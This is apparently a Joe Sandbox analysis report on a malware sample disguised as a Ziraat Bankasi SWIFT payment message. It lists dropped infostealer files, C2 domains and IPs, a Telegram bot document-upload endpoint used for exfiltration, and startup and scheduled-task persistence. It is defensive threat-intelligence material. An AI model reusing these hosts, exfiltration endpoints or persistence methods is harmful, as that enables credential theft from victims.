                          C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe100%AviraW32/Infector.Gen
                          C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                          C:\Windows\System32\alg.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\TrojanAI.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\server02.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\bothsided\spadixes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\TrojanAI.exe92%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                          C:\Users\user\AppData\Local\Temp\neworigin.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                          C:\Users\user\AppData\Local\Temp\server02.exe83%ReversingLabsByteCode-MSIL.Infostealer.Mintluks
                          C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe92%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://www.microsoft.c)0%Avira URL Cloudsafe
                          http://54.244.188.177/yqmdwhskkjhif0%Avira URL Cloudsafe
                          http://x1.c.lencr.0%Avira URL Cloudsafe
                          http://54.244.188.177/vnpplpufavm0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          cvgrf.biz
                          54.244.188.177
                          truefalse
                            high
                            ssbzmoy.biz
                            18.141.10.107
                            truefalse
                              high
                              pywolwnvd.biz
                              54.244.188.177
                              truefalse
                                high
                                api.ipify.org
                                172.67.74.152
                                truefalse
                                  high
                                  reallyfreegeoip.org
                                  172.67.177.134
                                  truefalse
                                    high
                                    s82.gocheapweb.com
                                    51.195.88.199
                                    truefalse
                                      high
                                      npukfztj.biz
                                      44.221.84.105
                                      truefalse
                                        high
                                        checkip.dyndns.com
                                        132.226.8.169
                                        truefalse
                                          high
                                          checkip.dyndns.org
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://api.ipify.org/false
                                              high
                                              http://cvgrf.biz/yqmdwhskkjhiffalse
                                                high
                                                http://checkip.dyndns.org/false
                                                  high
                                                  http://pywolwnvd.biz/vnpplpufavmfalse
                                                    high
                                                    https://reallyfreegeoip.org/xml/8.46.123.228false
                                                      high
                                                      http://ssbzmoy.biz/kokmvodfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://54.244.188.177/yqmdwhskkjhifsvchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://account.dyn.com/svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://r11.o.lencr.org0#neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://reallyfreegeoip.orgdserver02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.microsoft.copowershell.exe, 0000000F.00000002.1388691557.000000000823F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.228dserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.orgserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.microsoft.c)powershell.exe, 0000000F.00000002.1388691557.00000000081E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://x1.c.lencr.neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://api.ipify.org/tneworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://cvgrf.biz/svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://r11.i.lencr.org/0neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.mipowershell.exe, 0000000F.00000002.1374308109.000000000720C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://api.ipify.orgsvchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://54.244.188.177/vnpplpufavmsvchost.exe, 00000022.00000003.1482948016.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575610744.0000000003280000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://checkip.dyndns.comdserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aka.ms/pscore6lBpowershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://x1.c.lencr.org/0neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://x1.i.lencr.org/0neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.228lserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://checkip.dyndns.org/qsvchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://contoso.com/powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://s82.gocheapweb.comneworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002986000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://reallyfreegeoip.orgserver02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://checkip.dyndns.orgdserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.orgserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://checkip.dyndns.comserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://checkip.dyndns.org/dserver02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserver02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://54.244.188.177/svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://api.telegram.org/bot-/sendDocument?chat_id=svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drfalse
                                                                                                                                high
                                                                                                                                https://reallyfreegeoip.org/xml/svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  132.226.8.169
                                                                                                                                  checkip.dyndns.comUnited States
                                                                                                                                  16989UTMEMUSfalse
                                                                                                                                  54.244.188.177
                                                                                                                                  cvgrf.bizUnited States
                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                  51.195.88.199
                                                                                                                                  s82.gocheapweb.comFrance
                                                                                                                                  16276OVHFRfalse
                                                                                                                                  18.141.10.107
                                                                                                                                  ssbzmoy.bizUnited States
                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                  172.67.177.134
                                                                                                                                  reallyfreegeoip.orgUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  172.67.74.152
                                                                                                                                  api.ipify.orgUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1564711
                                                                                                                                  Start date and time:2024-11-28 18:25:50 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 13m 53s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:43
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.spre.troj.spyw.expl.evad.winEXE@48/28@10/6
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 85%
                                                                                                                                  • Number of executed functions: 90
                                                                                                                                  • Number of non-executed functions: 295
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target TrojanAI.exe, PID 6340 because it is empty
                                                                                                                                  • Execution Graph export aborted for target TrojanAI.exe, PID 7952 because it is empty
                                                                                                                                  • Execution Graph export aborted for target TrojanAIbot.exe, PID 7252 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3036 because it is empty
                                                                                                                                  • Execution Graph export aborted for target server02.exe, PID 6012 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                  TimeTypeDescription
                                                                                                                                  12:26:53API Interceptor20x Sleep call for process: powershell.exe modified
                                                                                                                                  12:26:53API Interceptor5614300x Sleep call for process: neworigin.exe modified
                                                                                                                                  12:26:55API Interceptor2216773x Sleep call for process: TrojanAIbot.exe modified
                                                                                                                                  14:19:15API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                  18:26:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs
                                                                                                                                  18:26:52Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                  18:27:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  132.226.8.169QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  JIL-_Document_No._2500015903.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  Viderefrt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  54.244.188.177invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • lrxdmhrr.biz/tgcwttfqletfhyq
                                                                                                                                  Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • rynmcq.biz/msoqwwrwyts
                                                                                                                                  C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • rynmcq.biz/qqnj
                                                                                                                                  PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • pywolwnvd.biz/ksmybghbmbq
                                                                                                                                  IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • lrxdmhrr.biz/wt
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • rynmcq.biz/qwi
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • ecxbwt.biz/brgveksk
                                                                                                                                  Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • gentleanother.net/index.php
                                                                                                                                  YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • gentleanother.net/index.php
                                                                                                                                  Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • gentleanother.net/index.php
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  cvgrf.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  ssbzmoy.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 18.141.10.107
                                                                                                                                  pywolwnvd.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                  • 54.244.188.177
